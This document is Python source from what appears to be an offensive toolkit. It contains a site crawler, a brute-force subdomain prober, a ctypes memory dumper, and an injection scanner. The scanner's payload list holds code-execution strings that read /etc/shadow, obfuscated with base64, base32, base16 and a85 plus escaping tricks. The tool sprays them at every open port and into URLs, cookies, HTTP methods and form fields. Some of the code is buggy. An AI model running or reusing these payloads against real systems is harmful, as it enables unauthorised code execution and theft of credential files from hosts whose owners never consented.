import re
import time
import urllib.parse
import TheSilent.puppy_requests as puppy_requests

CYAN = "\033[1;36m"

def kitten_crawler(init_host,delay=0):
    host = init_host.rstrip("/")
    host_list = [host + "/"]
    try:
        sitemap_list = []
        data = puppy_requests.text(init_host + "/sitemap.xml").lower()
        data = data.replace("<","\n<")
        data = re.findall("<loc>(http\S+)",data.lower())
        for _ in data:
            _ = _.split("<")[0]
            if "sitemap" in _:
                sitemap_list.append(_)

            else:
                host_list.append(_)

    except:
        pass

    if len(sitemap_list) > 0:
        for _ in sitemap_list:
            time.sleep(delay)
            try:
                data = puppy_requests.text(_).lower()
                data = data.replace("<","\n<")
                data = re.findall("<loc>(http\S+)",data.lower())
                for __ in data:
                    host_list.append(__)

            except:
                pass

    _ = -1
    while True:
        _ += 1
        try:
            print(CYAN + host_list[_])
            time.sleep(delay)
            host_list = list(dict.fromkeys(host_list[:]))
            data = urllib.parse.unquote_plus(puppy_requests.text(host_list[_]).lower())

            contents = re.findall("content\s?=\s?[\"\'](\S+)[\"\']",data.lower())
            contents = list(set(contents[:]))
            for content in contents:
                skip = False
                for __ in content:
                    if re.search("[\"\'\<\>]",__):
                        skip = True

                if not skip:
                    if "script" not in content:
                        if content.startswith("/"):
                            content = href.rstrip('"')
                            content = href.rstrip("'")
                            host_list.append(host + content)

                        elif not content.startswith("http://") and not content.startswith("https://") and urllib.parse.urlparse(host).netloc not in content:
                            host_list.append(init_host + "/" + content)

                        elif content.startswith("http://") and content.startswith(init_host) in content or content.startswith("https://") and content.startswith(init_host):
                            host_list.append(content)

                        elif not content.startswith("http://") and not content.startswith("https://") and urllib.parse.urlparse(host).netloc in content and content.startswith("//"):
                            host_list.append(urllib.parse.urlparse(host).scheme + content)


            hrefs = re.findall("href\s?=\s?[\"\'](\S+)[\"\']",data.lower())
            hrefs = list(set(hrefs[:]))
            for href in hrefs:
                skip = False
                for __ in href:
                    if re.search("[\"\'\<\>]",__):
                        skip = True

                if not skip:
                    if "script" not in href:
                        if href.startswith("/"):
                            href = href.rstrip('"')
                            href = href.rstrip("'")
                            host_list.append(host + href)

                        elif not href.startswith("http://") and not href.startswith("https://") and urllib.parse.urlparse(host).netloc not in href:
                            host_list.append(init_host + "/" + href)

                        elif href.startswith("http://") and href.startswith(init_host) in href or href.startswith("https://") and href.startswith(init_host):
                            host_list.append(href)

                        elif not href.startswith("http://") and not href.startswith("https://") and urllib.parse.urlparse(host).netloc in href and href.startswith("//"):
                            host_list.append(urllib.parse.urlparse(host).scheme + href)

            sources = re.findall("src\s?=\s?[\"\'](\S+)[\"\']",data.lower())
            sources = list(set(sources[:]))
            for source in sources:
                skip = False
                for __ in source:
                    if re.search("[\"\'\<\>]",__):
                        skip = True

                if not skip:
                    if "script" not in source:
                        if source.startswith("/"):
                            source = source.rstrip('"')
                            source = source.rstrip("'")
                            host_list.append(init_host + source)

                        elif not source.startswith("http://") and not source.startswith("https://") and urllib.parse.urlparse(host).netloc not in source:
                            host_list.append(init_host + "/" + source)

                        elif source.startswith("http://") and source.startswith(init_host) or source.startswith("https://") and source.startswith(init_host):
                            host_list.append(source)

                        elif not source.startswith("http://") and not source.startswith("https://") and urllib.parse.urlparse(host).netloc in source and source.startswith("//"):
                            host_list.append(urllib.parse.urlparse(host).scheme + "/" + source)

        except IndexError:
            break

        except:
            continue

    host_list = list(dict.fromkeys(host_list[:]))
    return host_list



import itertools
import socket
from TheSilent.clear import clear

CYAN = "\033[1;36m"

def dns_shark(host, attempts=10):
    clear()
    characters = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9"]
    pages = []
    pages.append(host)
    tracker = -1
    attempt = 0
    for attempt in range(attempts):
        combos = itertools.product(characters, repeat=attempt+1)
        for combo in combos:
            my_tuple = ""
            for tuples in combo:
                my_tuple += tuples

            new_host = my_tuple + "." + host
            print(CYAN + f"checking: {new_host}/tcp")
            try:
                my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                my_socket.settimeout(15)
                my_socket.connect((new_host,80))
                my_socket.close()
                with open("dns_report.txt", "a") as file:
                    file.write(new_host + "/tcp\n")

            except ConnectionRefusedError:
                with open("dns_report.txt", "a") as file:
                    file.write(new_host + "/tcp\n")
                
            except (socket.gaierror, TimeoutError):
                my_socket.close()

            print(CYAN + f"checking: {new_host}/udp")
            try:
                my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                my_socket.settimeout(15)
                my_socket.sendto(b"",(new_host,80))
                with open("dns_report.txt", "a") as file:
                    file.write(new_host + "/udp\n")

            except ConnectionRefusedError:
                with open("dns_report.txt", "a") as file:
                    file.write(new_host + "/udp\n")

            except (socket.gaierror, TimeoutError):
                continue



import ctypes

def kiwi(address,default=True,_=65536):
    if default:
        result = ""
        data = ctypes.string_at(address,_)
        with open(f"{address}.kiwi", "wb") as file:
            file.write(data)
        return data

    else:
        data = ctypes.string_at(address,_).hex()
        with open(f"{address}.kiwi", "w") as file:
            file.write(data)
        return data



# a python injection scanner by Invizabel

import io
import re
import time
import urllib.parse
import socket
from urllib.parse import *
import TheSilent.dolphin as dolphin
import TheSilent.puppy_requests as puppy_requests
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

init_mal_python = [r"eval(compile('import os\nos.system(\'cat /etc/shadow\')', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.b64decode(b\'Y2F0IC9ldGMvc2hhZG93\').decode())', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.b32decode(b\'MNQXIIBPMV2GGL3TNBQWI33X\').decode())', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.b16decode(b\'636174202F6574632F736861646F77\').decode())', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.a85decode(b\'@psI%04f6806:f8A8cY\').decode())', 'melon', 'exec'))",
                   r"eval(compile('import os\ndef melon():\n    data = open(\'/etc/shadow\',\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.b64decode(b\'L2V0Yy9zaGFkb3c=\'),\'r\').decode(),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.b32decode(b\'F5SXIYZPONUGCZDPO4======\').decode(),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.b16decode(b\'2F6574632F736861646F77\').decode(),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))"
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.a85decode(b\'@psI%04f6806:f8A8cY\').decode(),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))"]

mal_python = init_mal_python[:]
for mal in mal_python:
    evade = ""
    for char in mal:
        evade += "\\" + char
    init_mal_python.append(evade)
for mal in init_mal_python:
    mal_python.append(io.BytesIO(mal.encode()))
    mal_python.append(io.BytesIO(mal.encode() + b" #.apk"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.bat"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.csv"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.gif"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.jpeg"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.jpg"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.log"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.m4a"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.mkv"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.mp3"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.mp4"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.pdf"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.png"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.ps1"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.sh"))

form_headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                "Accept-Encoding":"deflate",
                "Accept-Language":"en-US,en;q=0.5",
                "Content-Type":"application/x-www-form-urlencoded",
                "User-Agent":return_user_agent(),
                "UPGRADE-INSECURE-REQUESTS":"1"}

def melon(host,delay=0):
    print(CYAN + "")
    clear()
    hits = []

    ports = []
    banners = dolphin.dolphin(urllib.parse.urlparse(host).netloc)
    for banner in banners:
        ports.append(re.findall(":(\d+)-",banner)[0])

    print(CYAN + f"scanning ports for vulnerabilities on {urllib.parse.urlparse(host).netloc}")
    for port in ports:
        try:
            for mal in mal_python:
                time.sleep(delay)
                my_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                my_socket.settimeout(10)
                my_socket.connect((urllib.parse.urlparse(host).netloc,int(port)))
                my_socket.send(mal)
                my_socket.send(mal.encode())
                data = my_socket.recv(65536)
                my_socket.close()
                if len(data) > 0:
                    hits.append(f"{urllib.parse.urlparse(host).netloc}:{port}/tcp- {data} ({mal})")

        except:
            pass

        try:
            for mal in mal_python:
                time.sleep(delay)
                my_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
                my_socket.settimeout(10)
                my_socket.sendto(mal,(urllib.parse.urlparse(host).netloc,int(port)))
                my_socket.sendto(mal.encode(),(urllib.parse.urlparse(host).netloc,int(port)))
                data = my_socket.recvfrom(65536)
                my_socket.close()
                if len(data) > 0:
                    hits.append(f"{urllib.parse.urlparse(host).netloc}:{port}/udp- {data} ({mal})")

        except:
            pass

    print(CYAN + f"scanning for vulnerabilities on {host}")

    try:
        original_page = puppy_requests.text(host)
        all_forms = re.findall("<form[\S\s\n]+/form>", original_page)

    except:
        pass

    print(CYAN + "checking for python injection")
    for mal in mal_python:
        try:
            time.sleep(delay)
            data = puppy_requests.text(host + "/" + urllib.parse.quote_plus(mal))
            if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                hits.append(f"python injection in url ({host}): {mal}")

        except:
            pass

        try:
            time.sleep(delay)
            data = puppy_requests.text(host, params={mal:mal})
            if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                hits.append(f"python injection in header ({host}): {mal}")

        except:
            pass

        try:
            time.sleep(delay)
            data = puppy_requests.text(host, params={"Cookie":mal})
            if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                hits.append(f"python injection in cookie ({host}): {mal}")

        except:
            pass

        try:
            time.sleep(delay)
            data = puppy_requests.text(host, method=mal.upper())
            if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                hits.append(f"python injection in method ({host}): {mal}")

        except:
            pass

        try:
            if len(all_forms) > 0:
                for form in all_forms:
                    time.sleep(delay)
                    action_bool = True
                    form_names = []
                    mal_value = []
                    form_method = re.findall("method\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                    form_input = re.findall("<input.+>", form)
                    for field in form_input:
                        form_name = re.findall("name\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                        form_type = re.findall("type\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                        form_names.append(form_name)
                        if form_type.lower() == "button" or form_type.lower() == "hidden"  or form_type.lower() == "submit":
                            mal_value.append(re.findall("value\s?=\s?[\"\'](\S+)[\"\']", field)[0])

                        else:
                            mal_value.append(mal)

                    try:
                        action_tag = re.findall("action\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                        if action_tag.startswith("https://") or action_tag.startswith("http://"):
                            action = action_tag

                        if action_tag.startswith("/"):
                            action = host + action_tag

                        else:
                            action = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc + "/" + action_tag

                    except IndexError:
                        action_bool = False

                    if action_bool:
                        data = puppy_requests.text(action,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers)
                        if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                            hits.append(f"python injection in forms ({action}): {dict(zip(form_names,mal_value))}")

                    else:
                        data = puppy_requests.text(host,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers)
                        if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                            hits.append(f"python injection in forms ({host})- {dict(zip(form_names,mal_value))}")

        except:
            pass

    hits = list(set(hits[:]))
    hits.sort()
    clear()
    if len(hits) > 0:
        for hit in hits:
            print(RED + hit)

    else:
        print(GREEN + "we didn't find anything interesting")
